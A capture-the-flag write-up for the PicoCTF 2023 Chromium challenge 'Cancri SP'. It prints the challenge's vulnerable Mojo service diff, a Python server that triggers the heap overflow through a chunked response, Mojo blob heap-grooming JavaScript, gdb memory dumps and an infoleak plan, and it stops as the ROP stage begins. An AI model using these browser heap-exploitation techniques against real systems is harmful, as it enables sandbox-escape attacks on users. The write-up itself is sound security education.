/..

#CONTENT

#TOP

links
550 bytes2024-12-10 06:38
notes
35 MiB2025-02-14 18:56
posts
6 MiB2025-02-14 18:02
random
225 MiB2025-02-14 17:45
writeups
402 MiB2025-04-03 22:30
README.mdx
512 bytes2025-02-19 22:32
TODO.md
565 bytes2025-02-24 20:22

PicoCTF 2023: Cancri SP

Originally I looked at this challenge 2 years ago in PicoCTF 2023, but didn't manage to solve it in time. I was able to find the heap overflow vulnerability during the competition, but the rest of the challenge was too daunting for me to approach so I decided not to work on it. 2 years later I came back to look at the challenge again. The motivating factor for me was that nobody had posted a public writeup about the intended solution and I wanted to explore chromium exploitation.

#challenge exploration

The provided diff is quite large and implements quite a few new features. The full diff is available below for reference.

diff (collapsed)DIFF
   1 
   2 
   3 
   4 
   5 
   6 
   7 
   8 
   9 
  10 
  11 
  12 
  13 
  14 
  15 
  16 
  17 
  18 
  19 
  20 
  21 
  22 
  23 
  24 
  25 
  26 
  27 
  28 
  29 
  30 
  31 
  32 
  33 
  34 
  35 
  36 
  37 
  38 
  39 
  40 
  41 
  42 
  43 
  44 
  45 
  46 
  47 
  48 
  49 
  50 
  51 
  52 
  53 
  54 
  55 
  56 
  57 
  58 
  59 
  60 
  61 
  62 
  63 
  64 
  65 
  66 
  67 
  68 
  69 
  70 
  71 
  72 
  73 
  74 
  75 
  76 
  77 
  78 
  79 
  80 
  81 
  82 
  83 
  84 
  85 
  86 
  87 
  88 
  89 
  90 
  91 
  92 
  93 
  94 
  95 
  96 
  97 
  98 
  99 
 100 
 101 
 102 
 103 
 104 
 105 
 106 
 107 
 108 
 109 
 110 
 111 
 112 
 113 
 114 
 115 
 116 
 117 
 118 
 119 
 120 
 121 
 122 
 123 
 124 
 125 
 126 
 127 
 128 
 129 
 130 
 131 
 132 
 133 
 134 
 135 
 136 
 137 
 138 
 139 
 140 
 141 
 142 
 143 
 144 
 145 
 146 
 147 
 148 
 149 
 150 
 151 
 152 
 153 
 154 
 155 
 156 
 157 
 158 
 159 
 160 
 161 
 162 
 163 
 164 
 165 
 166 
 167 
 168 
 169 
 170 
 171 
 172 
 173 
 174 
 175 
 176 
 177 
 178 
 179 
 180 
 181 
 182 
 183 
 184 
 185 
 186 
 187 
 188 
 189 
 190 
 191 
 192 
 193 
 194 
 195 
 196 
 197 
 198 
 199 
 200 
 201 
 202 
 203 
 204 
 205 
 206 
 207 
 208 
 209 
 210 
 211 
 212 
 213 
 214 
 215 
 216 
 217 
 218 
 219 
 220 
 221 
 222 
 223 
 224 
 225 
 226 
 227 
 228 
 229 
 230 
 231 
 232 
 233 
 234 
 235 
 236 
 237 
 238 
 239 
 240 
 241 
 242 
 243 
 244 
 245 
 246 
 247 
 248 
 249 
 250 
 251 
 252 
 253 
 254 
 255 
 256 
 257 
 258 
 259 
 260 
 261 
 262 
 263 
 264 
 265 
 266 
 267 
 268 
 269 
 270 
 271 
 272 
 273 
 274 
 275 
 276 
 277 
 278 
 279 
 280 
 281 
 282 
 283 
 284 
 285 
 286 
 287 
 288 
 289 
 290 
 291 
 292 
 293 
 294 
 295 
 296 
 297 
 298 
 299 
 300 
 301 
 302 
 303 
 304 
 305 
 306 
 307 
 308 
 309 
 310 
 311 
 312 
 313 
 314 
 315 
 316 
 317 
 318 
 319 
 320 
 321 
 322 
 323 
 324 
 325 
 326 
 327 
 328 
 329 
 330 
 331 
 332 
 333 
 334 
diff --git a/content/browser/BUILD.gn b/content/browser/BUILD.gn
index 258a8b0ff4f73..898712edb9151 100644
--- a/content/browser/BUILD.gn
+++ b/content/browser/BUILD.gn
@@ -1381,6 +1381,8 @@ source_set("browser") {
"origin_trials/critical_origin_trials_throttle.h",
"origin_trials/origin_trials_utils.cc",
"origin_trials/origin_trials_utils.h",
+ "otter/otter_broker_service_impl.cc",
+ "otter/otter_broker_service_impl.h",
"payments/installed_payment_apps_finder_impl.cc",
"payments/installed_payment_apps_finder_impl.h",
"payments/payment_app_context_impl.cc",
diff --git a/content/browser/browser_interface_binders.cc b/content/browser/browser_interface_binders.cc
index d76825db14850..5ec6d9fb74b50 100644
--- a/content/browser/browser_interface_binders.cc
+++ b/content/browser/browser_interface_binders.cc
@@ -774,6 +774,9 @@ void PopulateFrameBinders(RenderFrameHostImpl* host, mojo::BinderMap* map) {
map->Add<blink::mojom::NotificationService>(base::BindRepeating(
&RenderFrameHostImpl::CreateNotificationService, base::Unretained(host)));

+ map->Add<blink::mojom::OtterBrokerService>(base::BindRepeating(
+ &RenderFrameHostImpl::CreateOtterBrokerService, base::Unretained(host)));
+
map->Add<network::mojom::P2PSocketManager>(
base::BindRepeating(&BindSocketManager, base::Unretained(host)));

diff --git a/content/browser/otter/otter_broker_service_impl.cc b/content/browser/otter/otter_broker_service_impl.cc
index e69de29bb2d1d..cc6b767bec6e9 100644
--- a/content/browser/otter/otter_broker_service_impl.cc
+++ b/content/browser/otter/otter_broker_service_impl.cc
@@ -0,0 +1,168 @@
+#include "content/browser/otter/otter_broker_service_impl.h"
+
+#include "content/browser/renderer_host/render_frame_host_impl.h"
+#include "content/browser/url_loader_factory_params_helper.h"
+#include "services/network/public/mojom/url_loader_factory.mojom.h"
+
+#include <iostream>
+
+namespace content {
+
+constexpr net::NetworkTrafficAnnotationTag kTrafficAnnotation =
+net::DefineNetworkTrafficAnnotation("otter_notif", "OTTER");
+
+OtterBrokerServiceImpl::OtterBrokerServiceImpl(base::WeakPtr<RenderFrameHostImpl> frame_ptr): frame_{std::move(frame_ptr)} {
+ auto* frame = frame_.get();
+ auto params = URLLoaderFactoryParamsHelper::CreateForFrame(
+ frame, frame->GetLastCommittedOrigin(),
+ frame->GetIsolationInfoForSubresources(),
+ frame->BuildClientSecurityState(),
+ /**coep_reporter=*/mojo::NullRemote(), frame->GetProcess(),
+ network::mojom::TrustTokenRedemptionPolicy::kForbid,
+ frame->GetCookieSettingOverrides(), "OtterBrokerServiceImpl");
+
+ params->is_corb_enabled = false;
+
+ frame_->GetProcess()->CreateURLLoaderFactory(
+ url_loader_factory_.BindNewPipeAndPassReceiver(),
+ std::move(params)
+ );
+}
+
+OtterBrokerServiceImpl::~OtterBrokerServiceImpl() = default;
+
+void OtterBrokerServiceImpl::QueryRpc(const std::string& method, RpcCallback cb) {
+ mojo::Remote<network::mojom::URLLoader> url_loader;
+ mojo::PendingRemote<network::mojom::URLLoaderClient> url_loader_client;
+ network::ResourceRequest resource_request;
+ mojo::PendingReceiver<network::mojom::URLLoader> url_loader_receiver;
+ GURL::Replacements replacements;
+
+ url_loader_receiver = url_loader.BindNewPipeAndPassReceiver(),
+
+ replacements.SetHostStr(host_);
+ resource_request.url = GURL("http://osec.io/").ReplaceComponents(replacements);
+
+ resource_request.method = net::HttpRequestHeaders::kPostMethod;
+ resource_request.request_initiator = frame_->GetLastCommittedOrigin();
+ resource_request.headers.SetHeader("accept-language", "en-US");
+ resource_request.headers.SetHeader("content-type", "application/json");
+ resource_request.headers.SetHeader("user-agent", "OtterBroker");
+
+ char data[0x80];
+ size_t data_len = std::snprintf(data, sizeof(data), "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":null}", method.c_str());
+ CHECK(data_len < sizeof(data));
+
+ resource_request.request_body = new network::ResourceRequestBody();
+ resource_request.request_body->AppendBytes(data, data_len);
+
+ mojo::MakeSelfOwnedReceiver(
+ std::make_unique<RequestHandlerImpl>(std::move(url_loader), std::move(cb)),
+ url_loader_client.InitWithNewPipeAndPassReceiver()
+ );
+
+ url_loader_factory_->CreateLoaderAndStart(
+ std::move(url_loader_receiver),
+ 0,
+ network::mojom::kURLLoadOptionBlockAllCookies,
+ std::move(resource_request),
+ std::move(url_loader_client),
+ net::MutableNetworkTrafficAnnotationTag(kTrafficAnnotation)
+ );
+
+}
+
+void AfterGetSlot(OtterBrokerServiceImpl::GetSlotCallback callback, const std::vector<uint8_t> data) {
+ if (data.size() == 0) {
+ std::move(callback).Run(0);
+ } else {
+ std::move(callback).Run(atoi((char*) data.data()));
+ }
+}
+
+void OtterBrokerServiceImpl::GetSlot(GetSlotCallback callback) {
+ if (!inited_) {
+ mojo::ReportBadMessage("OtterBrokerServiceImpl: Init not yet invoked");
+ std::move(callback).Run(0);
+ return;
+ }
+
+ QueryRpc("getSlot", base::BindOnce(&AfterGetSlot, std::move(callback)));
+}
+
+void OtterBrokerServiceImpl::Init(const std::string& host, InitCallback callback) {
+ if (inited_) {
+ mojo::ReportBadMessage("OtterBrokerServiceImpl: Init already invoked");
+ std::move(callback).Run();
+ return;
+ }
+
+ inited_ = true;
+ host_ = host;
+
+ std::move(callback).Run();
+}
+
+RequestHandlerImpl::RequestHandlerImpl(mojo::Remote<network::mojom::URLLoader> url_loader, OtterBrokerServiceImpl::RpcCallback callback): url_loader_{std::move(url_loader)}, callback_{std::move(callback)} {
+}
+
+RequestHandlerImpl::~RequestHandlerImpl() {
+ if (callback_) {
+ std::move(callback_).Run(std::vector<uint8_t>());
+ }
+}
+
+void RequestHandlerImpl::OnReceiveEarlyHints(network::mojom::EarlyHintsPtr early_hints) {
+}
+
+void RequestHandlerImpl::OnReceiveResponse(
+ network::mojom::URLResponseHeadPtr head,
+ mojo::ScopedDataPipeConsumerHandle body,
+ absl::optional<mojo_base::BigBuffer> cached_metadata) {
+
+ int64_t content_len = head->headers->GetContentLength();
+
+ if (content_len < 0) return;
+
+ auto data = std::make_unique<uint8_t[]>(content_len);
+ uint8_t* ptr = data.get();
+
+ uint32_t num_bytes;
+ MojoResult result;
+ while ((result = body->ReadData(ptr, &num_bytes, MOJO_READ_DATA_FLAG_NONE)) != MOJO_RESULT_FAILED_PRECONDITION) {
+ if (result == MOJO_RESULT_OK) {
+ ptr += num_bytes;
+ num_bytes = content_len;
+ }
+ }
+
+ char start[] = "{\"jsonrpc\":\"2.0\",\"result\":";
+ char end[] = ",\"id\":0}";
+
+ size_t amt_read = (size_t) (ptr - data.get());
+ if (amt_read <= sizeof(start) + sizeof(end)) {
+ std::move(callback_).Run(std::vector<uint8_t>());
+ } else {
+ std::move(callback_).Run(std::vector<uint8_t>(data.get() + sizeof(start), ptr - sizeof(end)));
+ }
+}
+
+void RequestHandlerImpl::OnReceiveRedirect(const net::RedirectInfo& redirect_info,
+network::mojom::URLResponseHeadPtr head) {
+ url_loader_->FollowRedirect({}, {}, {}, absl::nullopt);
+}
+
+void RequestHandlerImpl::OnUploadProgress(
+ int64_t current_position,
+ int64_t total_size,
+ network::mojom::URLLoaderClient::OnUploadProgressCallback callback) {
+ CHECK(false);
+}
+
+void RequestHandlerImpl::OnTransferSizeUpdated(int32_t transfer_size_diff) {
+}
+
+void RequestHandlerImpl::OnComplete(const network::URLLoaderCompletionStatus& status) {
+}
+
+}
diff --git a/content/browser/otter/otter_broker_service_impl.h b/content/browser/otter/otter_broker_service_impl.h
index e69de29bb2d1d..cbc6371b64236 100644
--- a/content/browser/otter/otter_broker_service_impl.h
+++ b/content/browser/otter/otter_broker_service_impl.h
@@ -0,0 +1,66 @@
+#ifndef CONTENT_BROWSER_OTTER_OTTER_BROKER_SERVICE_IMPL_H_
+#define CONTENT_BROWSER_OTTER_OTTER_BROKER_SERVICE_IMPL_H_
+
+#include "base/memory/weak_ptr.h"
+#include "mojo/public/cpp/bindings/remote.h"
+#include "third_party/blink/public/mojom/otter/otter_broker.mojom.h"
+#include "services/network/public/mojom/url_loader.mojom.h"
+#include "services/network/public/mojom/url_loader_factory.mojom.h"
+
+namespace content {
+
+class RenderFrameHostImpl;
+
+class OtterBrokerServiceImpl final
+ : public blink::mojom::OtterBrokerService {
+ public:
+ using RpcCallback = base::OnceCallback<void(std::vector<uint8_t>)>;
+
+ OtterBrokerServiceImpl(base::WeakPtr<RenderFrameHostImpl> frame);
+ ~OtterBrokerServiceImpl() override;
+
+ void Init(const std::string& host, InitCallback callback) override;
+ void GetSlot(GetSlotCallback callback) override;
+
+ void QueryRpc(const std::string& method, RpcCallback cb);
+
+ private:
+ bool inited_ = false;
+ std::string host_;
+ const base::WeakPtr<RenderFrameHostImpl> frame_;
+ mojo::Remote<network::mojom::URLLoaderFactory> url_loader_factory_;
+};
+
+class RequestHandlerImpl: public network::mojom::URLLoaderClient {
+ public:
+ RequestHandlerImpl(mojo::Remote<network::mojom::URLLoader> url_loader, OtterBrokerServiceImpl::RpcCallback callback);
+ ~RequestHandlerImpl() override;
+
+ void OnReceiveEarlyHints(network::mojom::EarlyHintsPtr early_hints) override;
+
+ void OnReceiveResponse(
+ network::mojom::URLResponseHeadPtr head,
+ mojo::ScopedDataPipeConsumerHandle body,
+ absl::optional<mojo_base::BigBuffer> cached_metadata) override;
+
+ void OnReceiveRedirect(const net::RedirectInfo& redirect_info,
+ network::mojom::URLResponseHeadPtr head) override;
+
+ void OnUploadProgress(
+ int64_t current_position,
+ int64_t total_size,
+ network::mojom::URLLoaderClient::OnUploadProgressCallback callback) override;
+
+ void OnTransferSizeUpdated(int32_t transfer_size_diff) override;
+
+ void OnComplete(const network::URLLoaderCompletionStatus& status) override;
+
+
+ private:
+ mojo::Remote<network::mojom::URLLoader> url_loader_;
+ OtterBrokerServiceImpl::RpcCallback callback_;
+};
+
+}
+
+#endif
diff --git a/content/browser/renderer_host/render_frame_host_impl.cc b/content/browser/renderer_host/render_frame_host_impl.cc
index 6255ee6071bfd..c092914a0d9da 100644
--- a/content/browser/renderer_host/render_frame_host_impl.cc
+++ b/content/browser/renderer_host/render_frame_host_impl.cc
@@ -10828,6 +10828,13 @@ void RenderFrameHostImpl::CreateNotificationService(
storage_key(), std::move(receiver));
}

+void RenderFrameHostImpl::CreateOtterBrokerService(
+ mojo::PendingReceiver<blink::mojom::OtterBrokerService> receiver) {
+ mojo::MakeSelfOwnedReceiver(
+ std::make_unique<OtterBrokerServiceImpl>(weak_ptr_factory_.GetWeakPtr()),
+ std::move(receiver));
+}
+
void RenderFrameHostImpl::CreateInstalledAppProvider(
mojo::PendingReceiver<blink::mojom::InstalledAppProvider> receiver) {
InstalledAppProviderImpl::Create(*this, std::move(receiver));
diff --git a/content/browser/renderer_host/render_frame_host_impl.h b/content/browser/renderer_host/render_frame_host_impl.h
index 14e281b743ac6..4cfaeb825059a 100644
--- a/content/browser/renderer_host/render_frame_host_impl.h
+++ b/content/browser/renderer_host/render_frame_host_impl.h
@@ -46,6 +46,7 @@
#include "content/browser/buckets/bucket_context.h"
#include "content/browser/can_commit_status.h"
#include "content/browser/network/cross_origin_opener_policy_reporter.h"
+#include "content/browser/otter/otter_broker_service_impl.h"
#include "content/browser/renderer_host/back_forward_cache_impl.h"
#include "content/browser/renderer_host/back_forward_cache_metrics.h"
#include "content/browser/renderer_host/browsing_context_state.h"
@@ -1921,6 +1922,9 @@ class CONTENT_EXPORT RenderFrameHostImpl
void CreateNotificationService(
mojo::PendingReceiver<blink::mojom::NotificationService> receiver);

+ void CreateOtterBrokerService(
+ mojo::PendingReceiver<blink::mojom::OtterBrokerService> receiver);
+
void CreateInstalledAppProvider(
mojo::PendingReceiver<blink::mojom::InstalledAppProvider> receiver);

diff --git a/third_party/blink/public/mojom/BUILD.gn b/third_party/blink/public/mojom/BUILD.gn
index 036aede8f75a8..ee191563ae057 100644
--- a/third_party/blink/public/mojom/BUILD.gn
+++ b/third_party/blink/public/mojom/BUILD.gn
@@ -144,6 +144,7 @@ mojom("mojom_platform") {
"notifications/notification_service.mojom",
"oom_intervention/oom_intervention.mojom",
"opengraph/metadata.mojom",
+ "otter/otter_broker.mojom",
"parakeet/ad_request.mojom",
"payments/payment_app.mojom",
"peerconnection/peer_connection_tracker.mojom",
diff --git a/third_party/blink/public/mojom/otter/otter_broker.mojom b/third_party/blink/public/mojom/otter/otter_broker.mojom
index e69de29bb2d1d..c54e7ad7e7587 100644
--- a/third_party/blink/public/mojom/otter/otter_broker.mojom
+++ b/third_party/blink/public/mojom/otter/otter_broker.mojom
@@ -0,0 +1,6 @@
+module blink.mojom;
+
+interface OtterBrokerService {
+ Init(string host) => ();
+ GetSlot() => (uint64 slot);
+};

The diff adds a OtterBroker mojom service that will send a POST request to a user specified server and parses the response with a custom response handler. Mojo is an IPC system for communicating between the renderer process and the browser process.

More in-depth reading about mojo:

CPP
void OtterBrokerServiceImpl::QueryRpc(const std::string& method, RpcCallback cb) {
mojo::Remote<network::mojom::URLLoader> url_loader;
mojo::PendingRemote<network::mojom::URLLoaderClient> url_loader_client;
network::ResourceRequest resource_request;
mojo::PendingReceiver<network::mojom::URLLoader> url_loader_receiver;
GURL::Replacements replacements;

url_loader_receiver = url_loader.BindNewPipeAndPassReceiver(),

replacements.SetHostStr(host_);
resource_request.url = GURL("http://osec.io/").ReplaceComponents(replacements);

resource_request.method = net::HttpRequestHeaders::kPostMethod;
resource_request.request_initiator = frame_->GetLastCommittedOrigin();
resource_request.headers.SetHeader("accept-language", "en-US");
resource_request.headers.SetHeader("content-type", "application/json");
resource_request.headers.SetHeader("user-agent", "OtterBroker");

char data[0x80];
size_t data_len = std::snprintf(data, sizeof(data), "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"%s\",\"params\":null}", method.c_str());
CHECK(data_len < sizeof(data));

resource_request.request_body = new network::ResourceRequestBody();
resource_request.request_body->AppendBytes(data, data_len);

mojo::MakeSelfOwnedReceiver(
std::make_unique<RequestHandlerImpl>(std::move(url_loader), std::move(cb)),
url_loader_client.InitWithNewPipeAndPassReceiver()
);

url_loader_factory_->CreateLoaderAndStart(
std::move(url_loader_receiver),
0,
network::mojom::kURLLoadOptionBlockAllCookies,
std::move(resource_request),
std::move(url_loader_client),
net::MutableNetworkTrafficAnnotationTag(kTrafficAnnotation)
);

}

void RequestHandlerImpl::OnReceiveResponse(
network::mojom::URLResponseHeadPtr head,
mojo::ScopedDataPipeConsumerHandle body,
absl::optional<mojo_base::BigBuffer> cached_metadata) {

int64_t content_len = head->headers->GetContentLength();

if (content_len < 0) return;

auto data = std::make_unique<uint8_t[]>(content_len);
uint8_t* ptr = data.get();

uint32_t num_bytes;
MojoResult result;
while ((result = body->ReadData(ptr, &num_bytes, MOJO_READ_DATA_FLAG_NONE)) != MOJO_RESULT_FAILED_PRECONDITION) {
if (result == MOJO_RESULT_OK) {
ptr += num_bytes;
num_bytes = content_len;
}
}

char start[] = "{\"jsonrpc\":\"2.0\",\"result\":";
char end[] = ",\"id\":0}";

size_t amt_read = (size_t) (ptr - data.get());
if (amt_read <= sizeof(start) + sizeof(end)) {
std::move(callback_).Run(std::vector<uint8_t>());
} else {
std::move(callback_).Run(std::vector<uint8_t>(data.get() + sizeof(start), ptr - sizeof(end)));
}
}

These are the the public functions that are registered for the OtterBroker mojom service. Init allows the one time configuration of the target server to query and GetSlot performs the POST query to the target server.

JS
interface OtterBrokerService {
Init(string host) => ();
GetSlot() => (uint64 slot);
};
CPP
void OtterBrokerServiceImpl::GetSlot(GetSlotCallback callback) {
if (!inited_) {
mojo::ReportBadMessage("OtterBrokerServiceImpl: Init not yet invoked");
std::move(callback).Run(0);
return;
}

QueryRpc("getSlot", base::BindOnce(&AfterGetSlot, std::move(callback)));
}

void OtterBrokerServiceImpl::Init(const std::string& host, InitCallback callback) {
if (inited_) {
mojo::ReportBadMessage("OtterBrokerServiceImpl: Init already invoked");
std::move(callback).Run();
return;
}

inited_ = true;
host_ = host;

std::move(callback).Run();
}

Inside of the provided template/public folder we are given an index.html file that gives an example of how to communicate with the OtterBroker service:

index.htmlHTML
   1 
   2 
   3 
   4 
   5 
   6 
   7 
   8 
   9 
  10 
  11 
  12 
  13 
  14 
  15 
  16 
  17 
  18 
  19 
  20 
  21 
  22 
  23 
  24 
  25 
  26 
<script src="/mojojs/mojo_bindings.js"></script>
<script src="/mojojs/gen/third_party/blink/public/mojom/otter/otter_broker.mojom.js"></script>

<marquee id="txt"></marquee>
<button onclick="updateSlot()">Update Slot!</button>

<script>
const ptr = new blink.mojom.OtterBrokerServicePtr();
Mojo.bindInterface(
blink.mojom.OtterBrokerService.name,
mojo.makeRequest(ptr).handle
);

// This service is NOT in scope. This is merely meant to proxy
// Solana RPC transactions which unfortunately reject requests
// with a set Origin header.
//
// Please do NOT pwn this service. This is irrelevant to the
// challenge.
ptr.init("proxy.ottersec.workers.dev");

const updateSlot = async () => {
const { slot } = await ptr.getSlot();
txt.innerText = slot;
};
</script>

#vulnerability

Immediately one part of the response handling code stands out as suspicious:

CPP
    int64_t content_len = head->headers->GetContentLength();

if (content_len < 0) return;

auto data = std::make_unique<uint8_t[]>(content_len);
uint8_t* ptr = data.get();

uint32_t num_bytes;
MojoResult result;
while ((result = body->ReadData(ptr, &num_bytes, MOJO_READ_DATA_FLAG_NONE)) != MOJO_RESULT_FAILED_PRECONDITION) {
if (result == MOJO_RESULT_OK) {
ptr += num_bytes;
num_bytes = content_len;
}
}

The code reads the value of the Content-Length header, allocates a uint8_t array based on the content length, and then reads the request body into the array. This code is strange because there are many different ways to manipulate the actual size of a response body to be different from the Content-Length header.

One example of this is the Transfer-Encoding: chunked header. Instead of sending the body of the response in one block it is chunked into individual blocks with each block specifying its own length. When receiving a response with Transfer-Encoding: chunked you are not supposed to trust the Content-Length header. But the OtterBroker response handler doesn't seem to check for this...

We can test this out with a custom python server:

server.pyPY
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer as HTTPServer

class Handler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"

def do_POST(self):
contentlen = int(self.headers.get("Content-Length"))
data = self.rfile.read(contentlen)

dummy_len = 0
payload = b"A" * 0x700

self.send_response(200)
self.send_header("Transfer-Encoding", "chunked")
self.send_header("Content-Length", str(dummy_len))
self.end_headers()

body: bytes = b""
body += f"{len(payload):x}\r\n".encode()
body += payload
body += b"\r\n"
body += b"0\r\n\r\n\r\n"

self.wfile.write(body)

server = HTTPServer(("0.0.0.0", 80), Handler)
server.serve_forever()
index.htmlHTML
   1 
   2 
   3 
   4 
   5 
   6 
   7 
   8 
   9 
  10 
  11 
  12 
  13 
  14 
  15 
  16 
<script src="mojojs/mojo_bindings.js"></script>
<script src="mojojs/gen/third_party/blink/public/mojom/otter/otter_broker.mojom.js"></script>

<script>
const ptr = new blink.mojom.OtterBrokerServicePtr();
Mojo.bindInterface(
blink.mojom.OtterBrokerService.name,
mojo.makeRequest(ptr).handle
);

ptr.init("localhost");

(async () => {
await ptr.getSlot();
})();
</script>

If we point OtterBroker to our local server and trigger a request, chrome will crash with an error message:

CPP
../../base/allocator/partition_allocator/partition_cookie.h(27) Check failed: *cookie_ptr == kCookieValue[i]

Inspecting the chromium source, the path that ends up checking this cookie value looks like this:

PartitionFree -> FreeInlineUnknownRoot -> FreeInline -> FreeNoHooksImmediate -> PartitionCookieCheckValue

FreeNoHooksImmediate ends up calling PartitionCookieCheckValue here.

kcookie check

The kCookieValue is defined here, and is surprisingly set to a static value. Normally cookie values are dynamically generated at runtime to prevent an attacker from being able to bypass the cookie check without leaking the value first. However here no leaks are required since we know the value of the cookie before hand.

kcookie

#BLOBS

Prior to this, I knew that the solution would have something to do with mojo blobs. Mojo blobs are controlled bits of data that can be allocated through the mojo blob interface. They are also a perfect target for our overflow vulnerability since they are allocated on the same heap as our response buffer. I didn't know anything about what a blob looks like in memory, so I wrote a simple script that would let me find the blobs in memory easily to inspect.

index.htmlHTML
   1 
   2 
   3 
   4 
   5 
   6 
   7 
   8 
   9 
  10 
  11 
  12 
  13 
  14 
  15 
  16 
  17 
  18 
  19 
  20 
  21 
  22 
  23 
  24 
  25 
  26 
  27 
  28 
  29 
  30 
  31 
  32 
  33 
  34 
  35 
  36 
  37 
  38 
  39 
  40 
  41 
  42 
  43 
  44 
  45 
  46 
  47 
  48 
  49 
  50 
  51 
  52 
  53 
  54 
  55 
  56 
  57 
  58 
  59 
  60 
  61 
  62 
  63 
  64 
  65 
  66 
  67 
  68 
  69 
  70 
<script src="mojojs/mojo_bindings.js"></script>
<script src="mojojs/gen/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>

<script>
let blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
Mojo.bindInterface(
blink.mojom.BlobRegistry.name,
mojo.makeRequest(blob_registry_ptr).handle,
"process"
);

let global_blobs = [];

async function getBlob(store, data) {
function Impl() {}
Impl.prototype = {
requestAsReply: async (a, b) => {
return {
data: [1],
};
},
requestAsStream: () => log("hi2"),
requestAsFile: () => log("hi3"),
};

let bytes_provider = new mojo.Binding(
blink.mojom.BytesProvider,
new Impl()
);
let bytes_provider_ptr = new blink.mojom.BytesProviderPtr();
bytes_provider.bind(mojo.makeRequest(bytes_provider_ptr));

let blob_ptr = new blink.mojom.BlobPtr();
let blob_req = mojo.makeRequest(blob_ptr);

if (typeof data === "string") {
data = new TextEncoder().encode(data);
// console.log(data.constructor.name);
}

let data_element = new blink.mojom.DataElement();
data_element.bytes = new blink.mojom.DataElementBytes();
data_element.bytes.length = data.length;
data_element.bytes.embeddedData = data;
data_element.bytes.data = bytes_provider_ptr;

let r = await blob_registry_ptr.register(
blob_req,
Math.random().toString(),
"text/data",
"text/data",
[data_element]
);

store.push(blob_ptr);
return blob_ptr;
}

(async () => {
for (let i = 0; i < 1000; i++) {
await getBlob(global_blobs, "R".repeat(0x1000));
}
let data = "LES-AMATEURS";
data += "Z".repeat(0x1000 - data.length);
let blob1 = await getBlob(global_blobs, data);
let blob2 = await getBlob(global_blobs, data);

while (1) {}
})();
</script>

Here we first allocate 1000 blobs to exhaust the allocator of free chunks that share the same size as our blob object. This forces the allocator to begin allocating new chunks from linear memory and guarantees that the new blobs with the LES-AMATEURS strings will be allocated next to each other. Then we can find the chunks in memory with gdb:

ANSI
gef> find LES-AMATEURS -d
[+] Searching 'LES-AMATEURS' in whole memory
[+] In (0x3c7401984000-0x3c740199a000 [rw-])
0x3c7401993c00: 4c 45 53 2d 41 4d 41 54 45 55 52 53 5a 5a 5a 5a | LES-AMATEURSZZZZ |
0x3c7401995000: 4c 45 53 2d 41 4d 41 54 45 55 52 53 5a 5a 5a 5a | LES-AMATEURSZZZZ |

Then we issue find calls for each of the string pointers to locate the actual blob object:

ANSI
gef> find 0x3c7401993c00
[+] Searching '\x00\x3c\x99\x01\x74\x3c' in whole memory
[+] In (0x3c740193c000-0x3c7401947000 [rw-])
0x3c74019457e0: 00 3c 99 01 74 3c 00 00 00 4c 99 01 74 3c 00 00 | .<..t<...L..t<.. |
gef> find 0x3c7401995000
[+] Searching '\x00\x50\x99\x01\x74\x3c' in whole memory
[+] In (0x3c740193c000-0x3c7401947000 [rw-])
0x3c7401945b60: 00 50 99 01 74 3c 00 00 00 60 99 01 74 3c 00 00 | .P..t<...`..t<.. |

Since we know that heap allocated objects always have a heap cookie, to find the start of the blob we just need to search backwards until we see the cookie value.

ANSI
gef> tele 0x3c74019457e0-0x80 20
0x3c7401945760|+0x0000|+000: 0x0000000000000000
0x3c7401945768|+0x0008|+001: 0xabababababababab
0x3c7401945770|+0x0010|+002: 0x0dd0fecaefbeadde <- !! heap cookie !!
0x3c7401945778|+0x0018|+003: 0x1eab11ba05f03713 <- !! heap cookie !!
0x3c7401945780|+0x0020|+004: 0x00005c26b2ed2d70 <vtable for storage::BlobDataItem+0x10> -> 0x00005c26ac41f1a0 <storage::BlobDataItem::~BlobDataItem()> -> 0x48535641e5894855
0x3c7401945788|+0x0028|+005: 0xabab000000000001
0x3c7401945790|+0x0030|+006: 0x0000000000000000
0x3c7401945798|+0x0038|+007: 0x0000000000000000
0x3c74019457a0|+0x0040|+008: 0x0000000000000000
0x3c74019457a8|+0x0048|+009: 0x0000000000000000
0x3c74019457b0|+0x0050|+010: 0x0000000000000000
0x3c74019457b8|+0x0058|+011: 0x0000000000000000
0x3c74019457c0|+0x0060|+012: 0x0000000000000000
0x3c74019457c8|+0x0068|+013: 0xabababab00000000
0x3c74019457d0|+0x0070|+014: 0x0000000000000000
0x3c74019457d8|+0x0078|+015: 0x0000000000001000
0x3c74019457e0|+0x0080|+016: 0x00003c7401993c00 -> 0x54414d412d53454c 'LES-AMATEURSZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ[...]'
0x3c74019457e8|+0x0088|+017: 0x00003c7401994c00 -> 0xabababababababab
0x3c74019457f0|+0x0090|+018: 0x00003c7401994c00 -> 0xabababababababab
0x3c74019457f8|+0x0098|+019: 0x0000000000000000

From this dump we can infer the offsets of some of the fields in the blob:

offset 0x00 -> BlobDataItem vtable

offset 0x08 -> refcount

offset 0x58 -> length of the blob

offset 0x60 -> pointer to data

offset 0x68 -> pointer to end of data

offset 0x70 -> pointer to end of data

The other parts of the blob are zeroed so we can just ignore them for now. We also know that the two blobs that contain LES-AMATEURS are allocated next to each other, the difference between them is the size of the blob object on the heap.

ANSI
gef> p 0x3c7401945b60-0x3c74019457e0
$1 = 0x380

So the size of a blob object on the heap is 0x370, subtracting 0x10 to account for the heap cookie.

#exploitation

#infoleak

To get an infoleak, we setup the heap in such a way that a blob can read its own pointers and the vtable of other blobs for a leak. First step is to allocate 2 blobs, BLOB(A) and BLOB(B). The data for BLOB(B) is located directly under BLOB(B) on the heap and can be achieved by allocating a run of blobs and freeing them in a certain order.

blob-1

Then we free BLOB(A) to leave a hole in the heap.

blob-2

Now we can reclaim the freed chunk with our response buffer by setting the Content-Length header to 0x370.

blob-3

Using the overflow I showed earlier, we can overwrite the length of BLOB(B) to a huge number.

blob-4

Now BLOB(B)'s data can be used to read the heap pointers in BLOB(B) as well as the vtable pointer of the next blob on the heap for a heap leak and binary leak.

blob-5

#rop

The BlobDataItem vtable holds two pointers function pointers:

ANSI
gef> tele 0x00005c26b2ed2d70 2
0x5c26b2ed2d70|+0x0000|+000: 0x00005c26ac41f1a0 <storage::BlobDataItem::~BlobDataItem()> -> 0x48535641e5894855
